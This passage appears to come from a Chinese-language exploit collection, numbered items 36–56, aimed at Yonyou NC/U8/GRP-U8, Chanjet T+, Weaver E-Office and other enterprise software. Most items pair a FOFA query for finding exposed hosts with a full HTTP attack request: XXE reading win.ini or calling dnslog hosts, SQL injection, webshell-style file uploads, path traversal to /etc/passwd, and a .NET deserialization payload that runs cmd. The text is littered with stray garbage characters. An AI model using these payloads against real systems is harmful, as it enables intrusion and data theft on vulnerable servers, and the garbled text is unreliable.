Host: 203.25.218.166:8888
! I. c) k, O+ G9 h! h1 v3 v! DUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info( b- Q3 M5 l; s6 y5 l
Accept-Encoding: gzip, deflate
; s+ X) {5 Z- W. nAccept: */*% I. w( f- _# N h! c: ~$ |$ x
Connection: close' k8 \3 N, F. v" ?! `" B8 B4 ]# j1 [
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA, B3 a) e! B* G8 M) r
Content-Length: 1907 p* e( i! |" D; Y$ f
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df03 Q. @8 ]2 t' M: l8 o3 D
. I4 ~* P% ?9 |2 ~+ T+ _7 n/ |
--fd28cb44e829ed1c197ec3bc71748df0* r& t" ^2 U) Q
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"9 K P) Y2 L; E; ?; g
* [" O7 R2 j/ n m |
<%out.println(1111*1111);%>* n3 l( o8 M1 O: O5 ^. \* I: s
--fd28cb44e829ed1c197ec3bc71748df0--
}) L% `1 @. I9 j5 G; l: p1 }" ^
# C0 f1 b( M1 I! F$ l/ k" A! `& |- F# d- m. i' C& {/ t
36. 用友NC-Cloud soapFormat XXE
5 c. ?+ L \. bFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
8 f J$ |2 v% S s WPOST /uapws/soapFormat.ajax HTTP/1.17 O0 h, w$ O) X$ P. y( e) _+ b/ T9 V
Host: 192.168.40.130:8989
7 r, g- f- w$ Q7 o' SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
9 o2 R' d# n1 n1 g7 W; |1 mContent-Length: 263$ u1 \( |' V I9 i0 D6 T; O, e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 ~, r5 Z$ S/ Q: Z! {& e
Accept-Encoding: gzip, deflate
X0 ]0 k# _0 z( S) uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% r, J( Y( u; M' nConnection: close
0 B7 b* A i$ G% fContent-Type: application/x-www-form-urlencoded
7 Q3 h3 I. a; x9 k8 i& H1 BUpgrade-Insecure-Requests: 1
/ w; H5 J5 E& s4 E1 i- ~* V
- E# K d; q6 U' [: ~msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a2 x0 m9 x8 D* q1 V4 a. K7 _& N
) a$ ~5 v9 e5 n) W4 {0 ` ~
& b% s6 ]. b3 b* Z37. 用友NC-Cloud IUpdateService XXE
, m0 d4 V+ @9 |! |FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
: T( t% i; c: FPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.16 J0 ^0 Z8 a3 i! p) M7 |
Host: 192.168.40.130:8989* j$ ?0 E+ ?9 `1 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
: p+ s! ?2 c( b$ V/ {) XContent-Length: 421" S5 |) F' q. H# z2 ^' T( M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 l- i, V6 {- }( x& N8 C5 C
Accept-Encoding: gzip, deflate
; w( q8 `' j5 {, g8 W W" [" b6 fAccept-Language: zh-CN,zh;q=0.9
2 D- r+ r1 q& IConnection: close4 r, a8 y, `5 O& Y. T! }' ?) }
Content-Type: text/xml;charset=UTF-8
& D* v4 M7 ^* n+ Q; ESOAPAction: urn:getResult i: ]7 i. N6 P$ ^# B; @' C
Upgrade-Insecure-Requests: 1& l9 S1 ^# W. t$ u; \
# t- ~4 D# K- I* n5 N2 h( t<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">0 {1 W' h* f B6 d
<soapenv:Header/>
% P5 w: k8 x/ f; s- f `<soapenv:Body>6 C' m! p9 F8 s% Y% B, |- a+ W; J
<iup:getResult>
- D5 ]- g& L. S2 R) {( l<!--type: string-->
& C; o9 ]: S5 h5 G<iup:string><![CDATA[5 d3 ]$ R- i- d; }$ n$ q C
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
' B* y% f, N8 r3 P- i<xxx/>]]></iup:string># C) y7 X; w% U( }! w) M
</iup:getResult>- ]5 o' p9 w9 x0 I6 Z* e8 F5 z
</soapenv:Body>
3 R- G8 z8 T& i! R/ j</soapenv:Envelope>
% l0 t+ ?1 O7 w/ \% s# h; b* H$ ^% {* P. E# i+ o
9 z* G( w, H0 n
4 _ |3 ^ E4 n# Z. b4 g d7 Q0 a38. 用友U8 Cloud smartweb2.RPC.d XXE
% ^( h3 @$ @' q' f7 E1 lFOFA:app="用友-U8-Cloud"
5 z0 O: K3 X @7 y' K- p# M3 B* APOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
7 K9 ?3 ~1 W4 O9 o- B. F3 CHost: 192.168.40.131:80887 D3 z: Q# v a) n$ x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25. m# O& C4 Y( |
Content-Length: 260
8 g! w4 @' m0 V+ V# ?* OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b35 y6 [9 s+ K4 D
Accept-Encoding: gzip, deflate
- d+ [0 v7 K: H1 T/ K0 RAccept-Language: zh-CN,zh;q=0.9* b2 P p! A+ m' R2 b7 V& J
Connection: close
- G. i4 n1 R @2 G7 J4 qContent-Type: application/x-www-form-urlencoded8 G9 z7 l6 d) r' p
2 u& }# ]$ b& \# B' `; C- N1 {__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>, v9 {' J1 c! p9 i7 J3 _; ]
8 a' ?5 L7 Y) H4 ^8 D# o. L7 `) m* j$ U/ W) a1 P8 T+ k: k) f
39. 用友U8 Cloud RegisterServlet SQL注入( a6 L! u2 t) G! d/ ~
FOFA:title="u8c"
6 ?: _7 D+ L5 `' ZPOST /servlet/RegisterServlet HTTP/1.1, ?) Z d* G3 V o* T( J
Host: 192.168.86.128:8089
# F: t5 L6 a, n# WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36, b# u6 B" k4 w( y$ `0 d" J& N
Connection: close
# z' q; Y$ _* F! X1 w# o. GContent-Length: 853 g, K3 M6 i8 d* M6 r7 V+ ^
Accept: */*
* x5 @0 A y% `. lAccept-Language: en
) y# m9 b% D! s j' }Content-Type: application/x-www-form-urlencoded% L+ J1 [: z! @ F" E9 q! j
X-Forwarded-For: 127.0.0.1) S! j" S) Z5 C3 R" e: x
Accept-Encoding: gzip
) m+ ]5 ^# y6 x, K" {0 _" e/ @' R3 b
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
5 }% m3 c6 n. p7 n% ?0 _% P7 A( n& M7 l8 c
1 G4 {; o9 Q( \+ e5 i. s; k
40. 用友U8-Cloud XChangeServlet XXE
~2 |7 F2 v% C$ o8 n7 wFOFA:app="用友-U8-Cloud"9 o3 u" O% l$ Y
POST /service/XChangeServlet HTTP/1.1
! w2 k2 @; z2 P/ eHost: x.x.x.x- Z0 U( i! l Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.369 h6 p. V4 y" S1 o
Content-Type: text/xml
' Q( l% z, x& zConnection: close
8 i4 u$ f( u( _0 c
( _+ e3 k. |2 Q6 i4 |, J5 |7 H<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>: h2 z& v" g6 X5 Q
W/ |+ T7 Y' y! p! [8 X9 v4 S- A; |' u8 {7 S
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
6 y2 [1 z8 X9 }9 k: r4 p* QFOFA:app="用友-U8-Cloud"
7 f8 i4 ?4 d: ^! j" IGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1: @5 c) n# `# u
Host:
+ M1 [% K" ^; _ ~. R% e: T, w& ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" v. z# [, _, Z2 y6 P
Content-Type: application/json
( |" b8 ?: w+ K' F: n" F. l6 OAccept-Encoding: gzip. M2 ?. I Z0 T" L
Connection: close
6 z1 j, t2 w7 l! b* u7 T+ h$ |$ I& {. ]) j1 t1 K
% _- f. P. _# r3 V: r% w7 u
42. 用友GRP-U8 SmartUpload01 文件上传$ t3 t5 X) n9 P* T) ?% M
FOFA:app="用友-GRP-U8"
8 A3 l! w0 z' q( M2 {& G2 qPOST /u8qx/SmartUpload01.jsp HTTP/1.1. t3 ?) ^! z& h3 K5 U" b" N/ w& s
Host: x.x.x.x
8 J; T* U. F, z- R6 ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt6 E1 R' `8 \- l; ~% M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
8 X) o6 |" z; V8 [3 X( t! l# {6 _# [. n6 A9 F* j
PAYLOAD( C! s8 V6 q- s- a0 J
) J3 H" u7 t2 c2 i* N+ w( F
( v" n* T9 i L% y+ M( \" a- ^http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml( L* S Z% n( r, i* p
$ H0 H" n8 ]! |7 G e( X43. 用友GRP-U8 userInfoWeb SQL注入致RCE t4 g% [7 a$ H0 F$ c/ l
FOFA:app="用友-GRP-U8"
: v0 k0 w- j6 u. ]+ iPOST /services/userInfoWeb HTTP/1.1
( n: }( p" J( OHost: your-ip `1 p5 I/ p% t' ^* q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 I& U- O. ]( `& p- `- R: @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! H d6 W: Y. }- k* hAccept-Encoding: gzip, deflate% L! K* Z( o) G r2 S/ ~. m9 z
Accept-Language: zh-CN,zh;q=0.92 `3 T9 _2 @$ y. o( z
Connection: close9 U1 W ]4 V& q+ z+ m# g% f0 l
SOAPAction:
3 x+ }7 H- a _/ h) W) h' B* G, yContent-Type: text/xml;charset=UTF-85 ]( e2 v/ c+ X
& f2 |7 P" ^0 K1 v
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
1 w2 D9 i" w: G% U/ W5 [ <soapenv:Header/>
% y5 P) T2 r+ f$ A. W( M <soapenv:Body>
4 ?# t! X. q% J4 ?2 v' Z <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">7 D; l3 [# s' ]
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>) J7 ~. i. M% G7 q
</ser:getUserNameById>
- b* @, u8 J# M: n# | </soapenv:Body>: i. q. e' ~1 W- R0 J. v
</soapenv:Envelope>* ]0 g5 E v5 r: {
- A9 O* f( E( y ]+ m
5 p* H6 x# a5 _: C: v& |
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
+ B* g, h, \2 gFOFA:app="用友-GRP-U8"
6 L2 Z" ~: W( }GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.10 |* d% k7 G& {! J# }+ Z2 {
Host: your-ip9 K# M) s3 p/ l# L; [* }( A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
/ U8 v# i( I0 }* D- f$ g( uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 v# e4 A8 c5 {1 p# J( h, P
Accept-Encoding: gzip, deflate. e+ s* ?6 _& d5 f* D) @2 R& s
Accept-Language: zh-CN,zh;q=0.9
& T- r! K$ O9 r6 Y2 e7 J: ?& \Connection: close% p$ _" [ Y* F ~4 t9 w
3 w1 A' l7 f. [
, d; x) \+ X4 y0 ]3 G( n5 ]- Y45. 用友GRP-U8 ufgovbank XXE/ j {" J- i+ C; D" v A( `
FOFA:app="用友-GRP-U8"9 H9 x" b- K6 K+ f8 h% S& f
POST /ufgovbank HTTP/1.1
/ { j" \. m+ O! I7 VHost: 192.168.40.130:222. }0 p8 j# P e' l0 o7 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.05 _+ ?7 @% x+ X0 h/ B2 i$ |
Connection: close
- q2 D | j: V8 j* w: Q' h7 v/ }' pContent-Length: 161
1 o3 Q$ P5 l6 o* A2 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' d7 T/ l" g: K! }+ X% g$ P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# B& h' `2 Q7 E, [6 O
Content-Type: application/x-www-form-urlencoded7 i" G" Z' i) A
Accept-Encoding: gzip1 o) Z- [ |2 U: \2 [! r
: J! w8 J; u2 a/ p4 F& Y
reqData=<?xml version="1.0"?>
; }# n- M4 R, z7 g2 l4 ~<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest2 U/ v' v$ _' @3 r7 K
4 s4 B7 u: |. M1 Z
1 s* Y2 W: \/ F5 }( b46. 用友GRP-U8 sqcxIndex.jsp SQL注入
" R7 @% P' F1 C# E! K$ h* `& f4 g3 EFOFA:app="用友-GRP-U8"- c9 I* P0 T) e# l. n, E% \ I
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
. y2 X. h' _- W/ EHost: your-ip( l L& d' P- h8 |8 y. P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
* p8 ?0 r- l# o- ?( t- f3 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 I5 v! C7 o) Q! T }. Y8 ?; ^
Accept-Encoding: gzip, deflate6 t, k9 E; P# p% r
Accept-Language: zh-CN,zh;q=0.9
5 t9 Y! l# k+ |- g8 i/ g+ m3 ]Connection: close
% F2 G/ W- f3 L8 V B* Y; n3 E
% j# b S0 ^) n" ~3 a* z1 q) D# }
. D( Q8 T: R8 S- S, t* I47. 用友GRP A++Cloud 政府财务云 任意文件读取. v, b& ]5 F( W$ R4 ]" ~
FOFA:body="/pf/portal/login/css/fonts/style.css"
* ?9 L+ W% Q; j( C1 uGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.19 w' m" c6 _7 i8 Q! x9 i6 m: q: `
Host: x.x.x.x; [- s, o* z( R
Cache-Control: max-age=0 n3 c1 @# u( b9 f) o
Upgrade-Insecure-Requests: 1
( p4 S8 k4 ?( rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* k7 g! b4 { o# I8 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; L) Y1 V0 Z) b9 w+ D
Accept-Encoding: gzip, deflate, br6 x. d# M7 l% }
Accept-Language: zh-CN,zh;q=0.9
0 Z# \0 |; N0 C- w, |- KIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
' S9 v: W R E" n; aConnection: close1 E! w; z3 b. w4 V; v* }/ q' Q7 ]/ N
- \% ?6 N. q$ S1 y5 [: w1 l$ x+ {$ O5 J. m- ~) v* V
/ \+ a! C+ }- o" L% X6 ^. |; \( s2 T48. 用友U8 CRM swfupload 任意文件上传) h7 m; }' b( L
FOFA:title="用友U8CRM"
/ q# R" u7 v' U: j& fPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1& K8 E, ^/ x3 l9 O) a
Host: your-ip
# C7 [2 E3 X$ d+ Y$ ?" V$ }: pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 H# p P8 u' v" m0 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- B* p4 A; i5 u2 o- vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# s4 H. d4 k' i& WAccept-Encoding: gzip, deflate
& R# ?$ ^/ S, i W1 V MContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
0 L. G5 S! j# Y+ H7 D, G------269520967239406871642430066855
& z" m/ S9 Z' g' lContent-Disposition: form-data; name="file"; filename="s.php"
0 y+ L8 W0 n+ X# y1 ]( _1231
9 h$ U" I2 Y- n- p' N8 N7 {7 ?Content-Type: application/octet-stream
# `# P! T2 Q: Z A o7 f& |# S( M------269520967239406871642430066855
. v/ D9 [. J4 E- y; P6 LContent-Disposition: form-data; name="upload"! K& v M0 P) z% ]
upload
" [) G; J* t0 T/ {) V------269520967239406871642430066855--2 V7 n' o' s" S% @& Z3 Q9 C
9 F, f n+ P4 `! x4 k! Q% H# H5 A) S. h: `; T0 Y+ M
49. 用友U8 CRM系统uploadfile.php接口任意文件上传- c( w& c/ z. s! M
FOFA:body="用友U8CRM"# ~6 j# I8 ?' c/ M
0 }' h2 k, G, \# ?( X" GPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.18 n0 m5 W- B3 Z4 T3 y, M4 ~% }
Host: x.x.x.x3 `3 b7 p. z: g3 Q7 F( f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! k6 d$ A, N& n- N* W ]Content-Length: 3293 t }$ i- j# W2 a3 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ ~ b# F: S# ]6 T( d$ n
Accept-Encoding: gzip, deflate
+ n* U4 l- P& E1 v+ zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 j1 x+ b* V5 q0 z5 z$ L) P' D# _
Connection: close9 x( m( J$ c) l- M
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
: D& T6 R5 V N+ D1 e" W1 S
- p6 ^9 [9 D" u+ E6 l7 W/ a-----------------------------vvv3wdayqv3yppdxvn3w
( j2 _* ?5 j. H( K* V9 U8 OContent-Disposition: form-data; name="file"; filename="%s.php "
C8 M+ D7 f" z( @/ i6 FContent-Type: application/octet-stream9 ?8 d1 s) E( R0 K( p$ _
N9 M# W' i% @+ J! r# C( Q2 R
wersqqmlumloqa
* i7 f8 J4 b9 A1 \& R-----------------------------vvv3wdayqv3yppdxvn3w) h4 V O9 N& P$ V
Content-Disposition: form-data; name="upload"* L C8 E" Z6 ?
+ a! v: F& @: C0 x& A
upload
- [0 Z7 I" ^' R1 Q9 ?- Q7 c7 |" N-----------------------------vvv3wdayqv3yppdxvn3w--8 @" a/ D2 p* w/ t* m4 h, U
9 r# W3 r0 `) b
' ]& e0 c0 G/ g- w# _9 Chttp://x.x.x.x/tmpfile/updB3CB.tmp.php
3 u* [' a3 S2 G5 i4 i: T0 L2 `6 b: r3 ~- w) a
50. QDocs Smart School 6.4.1 filterRecords SQL注入
) y+ G+ w, ^9 t$ { U; Y- F+ wFOFA:body="close closebtnmodal"7 I' v A, F2 b# d
POST /course/filterRecords/ HTTP/1.13 k/ l; |. J, K ^1 F9 p# T
Host: x.x.x.x
5 @' P6 P0 M' ^" R, lUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.367 I( N% P5 }8 m' ^* g1 X9 j4 I, k
Connection: close8 O$ ]9 {- H- R e1 y
Content-Length: 224) e0 y1 E- V1 ^. v! ?- g
Accept: */*
9 i& n: R8 h0 n/ M$ w( |Accept-Language: en1 P' g$ S( G& f4 k! T V! u
Content-Type: application/x-www-form-urlencoded3 C% t7 \' A: x. D( P; a( t0 h0 |9 f" W
Accept-Encoding: gzip
/ \- O) B! @, d% l; H! r6 X. L. I, r, v% C
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=12 N. } P7 Y: [. k n/ x6 A" Y8 @1 a$ u
1 u Y& b7 N6 T8 h
7 N v. m7 S, D
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
+ w- C/ [0 O# _+ S7 F6 dFOFA:app="云时空社会化商业ERP系统"
1 H% s! V9 E9 EGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
, q# {/ T. u# n$ Q3 U1 q' ?Host: your-ip; z* `/ i; ^; C3 W6 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" S0 Z. T: E3 W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
$ E$ W- I; U% E* a8 w2 Z5 x$ r2 gAccept-Encoding: gzip, deflate
/ z9 P" b Q* ?/ d( s" ] O pAccept-Language: zh-CN,zh;q=0.98 O; ~8 y Z, X! X! d; m' O
Connection: close
8 G% {6 m, t+ i/ Z; u
# D# `2 d3 _, Q0 @
+ i T; b: b. B' D7 a52. 泛微E-Office json_common.php sql注入
* }8 o7 F+ m& ?6 E1 j6 q3 nFOFA:app="泛微-EOffice"
0 m! |3 x" J4 f, _ jPOST /building/json_common.php HTTP/1.1& M* z5 K1 M1 E Y
Host: 192.168.86.128:8097 e, E8 i9 O( l
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- z# w. m. j! E, u3 ~+ iConnection: close" l2 r8 P/ B5 ]5 g+ E1 u+ \" j
Content-Length: 870 D5 m, H# n. Z# K& S: D& H
Accept: */*
3 M5 S) e2 ]; e7 w& ]. ]; ~Accept-Language: en
/ P i7 b b) g/ ^1 p a% iContent-Type: application/x-www-form-urlencoded6 K8 J$ p, C! Q& ^4 _* K
Accept-Encoding: gzip5 X' G) t5 p5 }, p `
4 P4 c8 }; Z$ X- I' Ftfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
9 a0 Q5 R1 p% b5 x5 H& A: \3 g- N1 A) X. B9 S' l X2 D0 l5 K6 ^& S
1 ^, B4 C! \( x4 m: L! [+ R
53. 迪普 DPTech VPN Service 任意文件上传
' ~9 a i; Y% y! T1 vFOFA:app="DPtech-SSLVPN"
1 h& A) ~3 l; u5 }/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
2 g7 H* t3 a' O% ^* g* a& [" A0 t3 L5 r" i! a8 [
2 z9 f! m9 S3 h |" d
54. 畅捷通T+ getstorewarehousebystore 远程代码执行5 d6 d9 Q9 M2 V# x$ G
FOFA:app="畅捷通-TPlus". H3 c( }6 V7 S. c. e+ |
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
% \3 b- o5 Y2 `& D; y7 q6 X& J1 J"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( y4 i( O; a* |6 j6 l/ p
/ C. Q0 R# ^# J( a+ v' ]( q
6 B) |! b1 x7 p1 M$ D' A8 t7 c* X完整数据包6 y& i( ^$ h: k% m
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
8 a( n* {4 l7 t. kHost: x.x.x.x
% R) D4 P/ s8 tUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
# E: |8 e% I# t$ c! qContent-Length: 593
2 h# G- D& |2 B1 \7 h# T/ s; c1 v5 o# Q. a, z) J' j" v
{2 [8 l* }' p- y" b
"storeID":{
$ f! {7 P1 \7 A+ Q "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
- ^" E" Q+ ]+ n8 Y% F "MethodName":"Start",
! o! X/ }4 C) @/ |0 {" s" _ "ObjectInstance":{+ x8 @$ \' h+ H; e8 O( M: H6 q% Y
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",! d9 ^" x" h6 F# _) x
"StartInfo":{
9 X# N k0 Y- \( u o "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",, ~* ?# v8 P2 q: n. B& v2 Y( H! y$ P
"FileName":"cmd",
# x1 Q, Y) p& |% X "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"1 k/ s+ g, y- M- X/ u4 @" O- \) X& H
}) X! b( Z. J; F" Q
}
/ e$ d1 X9 r+ x! p/ @: d% s }
- K4 T/ V& F0 Y5 x}
' b3 @) @8 v* N- u: G7 Z7 J7 q& Y8 D, u+ l0 }
" T. X0 l& U9 {
第二步,访问如下url
7 ]7 u8 |" L) h ^ X/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt) B, z# ]* @0 C* k
' Z1 X' Y( ^/ k
; k, T, r; [$ q9 i, W2 H$ W
55. 畅捷通T+ getdecallusers信息泄露) G: G* _; Z! w) t6 x
FOFA:app="畅捷通-TPlus"# }" M& v7 @+ [& p, C
第一步,通过
/ E) i% c$ d+ {- b9 S/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
: ^6 D7 k& n( z4 z2 ^, Q第二步,利用获取到的Cookie请求
2 B% Q4 ~8 E. A# Q d m/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
2 B& Y5 f( S; A; X
/ y' H8 }+ Q) R7 ^56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE( E5 ]3 x1 u7 Y6 e1 O: p l
FOFA: app="畅捷通-TPlus"
6 D7 d2 n( z) qPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.15 r5 A! N0 M/ x J& d' Q I
Host: x.x.x.x% ^/ o! o( s- M' J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36& v# j6 e5 O! ~8 X! h
Content-Type: application/json
2 x- L/ Q& p6 h9 {4 a' w' u( I
